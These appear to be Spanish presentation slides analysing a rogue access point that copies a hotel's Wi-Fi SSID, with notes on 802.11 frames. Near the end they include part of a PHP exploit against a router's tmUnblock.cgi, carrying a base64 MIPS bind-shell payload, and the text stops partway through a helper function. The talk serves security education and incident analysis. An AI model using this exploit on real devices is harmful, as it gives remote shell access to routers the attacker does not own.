Disclaimer

La ponencia que estas a punto de presenciar en carcter tcnico y educativo.

Esta presentacion y su contenido fueron realizados con intenciones educativas basandose en un incidente de seguridad documentado con autorizacin de las partes potencialmente afectadas.

He preferido mantener en anonimidad la entidad afectada por lo que los nombres mencionados (si aplica) no deben ser tomados como reales.

No me hago responsable del uso malintencionado que se le pueda dar a la informacion brindada.

Ninguno de mis clientes o empleadores tienen conocimiento especfico ni colaboraron, de manera directa o indirecta, con la investigacin ni el analisis que ser presentado.

Enjoy the ride :)

De qu va esta exposicin?

Contexto

Monitorizacin de un ataque potencial.

Especulaciones varias.

Reconocimiento y encapsulacin del espectro de ataque.

Medidas contraofensivas.

Especulacin e hiptesis sobre el esquema de red.

Topologias de escenario posibles.

Reflexiones varias.

Contramedidas preventivas.

Expectativa

Realidad

?

2 SSID's HOJO y 1 SSID Cisco42618

Fake HOJO y Cisco42618 comparten segmento LAN 192.168.1.0 /24 El otro HOJO entrega 192.168.103.0 /24

Sobre los dos que comparten IP publica (Y) recibo el mismo escaneo del puertos...

Gateway LAN (192.168.1.1) sniffeando puertos ...

Mac address TPLink ?!?!

Tramas IEEE 801.11

Estructura

Encabezado MAC : Frame control, version de protocolo, tipo de trama, BSSID, Origen y Desitino (30 Bytes)

Payload: Data o posible informacin contenida en las tramas de management (0 2312 Bytes)

FCS: Frame Check Sequence. Verifica la integridad. Cierra la trama con un calculo de redundancia cliclica cuyo resultado debe ser de la suma del encabezado MAC y el Payload (4 Bytes)

Tipos

Control Frame: Permite el intercambio de infomacion. RTS, CTS, ACK. Permite una mejor coordinacion entre el uso compartido y el espectro disponible

Data: Payload, contiene los paquetes TCP o UDP. Como el limite es de 2312 posiblemente sean fragmentados.

Management: Permiten encontrar otros AP y proveen la posibilidad de conectarte y desconectarte de un punto de acceso

Management Frames.

Beacons

Probes

Association

Authentication

Open Authentication

WPA / WPA2

Dino Zovi

Demo Time

Alguien parece estar duplicando el SSID de la red del hotel y abriendo acceso a una red intervenida

Voy a anotarlo en mi maquina de escribir invisible...

- Declaracion del encargado de no pertenencia del dispositivo: Check

- Verificacion de uso mal intencionado del standard IEEE 802.11g,n: Check

- Falta de dinero para salir de bares esa noche: Check

'Author' => [ 'Johannes Ullrich', #worm discovery 'Rew', # original exploit 'infodox', # another exploit 'Michael Messner ', # Metasploit module'juan vazquez' # minor help with msf module

error_reporting(0);

$host = "192.168.1.1";// IP objetivo$port = "8080";// Puerto objetivo$vuln = "tmUnblock.cgi";// hndUnblock.cgi tambien es vulnerable

// msfpayload linux/mipsle/shell_bind_tcp LPORT=4444 X

$shellcode = base64_decode("f0VMRgEBAQAAAAAAAAAAAAIACAABAAAAVABAADQAAAAAAAAAAA"."AAADQAIAABAAAAAAAAAAEAAAAAAAAAAABAAAAAQAB7AQAAogIA"."AAcAAAAAEAAA4P+9J/3/DiQnIMABJyjAAf//BihXEAIkDAEBAV"."BzDyT//1Aw7/8OJCdwwAERXA0kBGjNAf/9DiQncMABJWiuAeD/"."ra/k/6Cv6P+gr+z/oK8lIBAC7/8OJCcwwAHg/6UjSRACJAwBAQ"."FQcw8kJSAQAgEBBSROEAIkDAEBAVBzDyQlIBAC//8FKP//BihI"."EAIkDAEBAVBzDyT//1AwJSAQAv3/DyQnKOAB3w8CJAwBAQFQcw"."8kJSAQAgEBBSjfDwIkDAEBAVBzDyQlIBAC//8FKN8PAiQMAQEB"."UHMPJFBzBiT//9AEUHMPJP//BijH/w8kJ3jgASEg7wPw/6Sv9P"."+gr/f/DiQncMABIWDvAyFojgH//6Ct8P+lI6sPAiQMAQEBL2Jp"."bi9zaA==");

// Usar la funcion urlencode() rompe el exploit.

function full_urlencode($string) {

$ret = ""; for($c=0; $c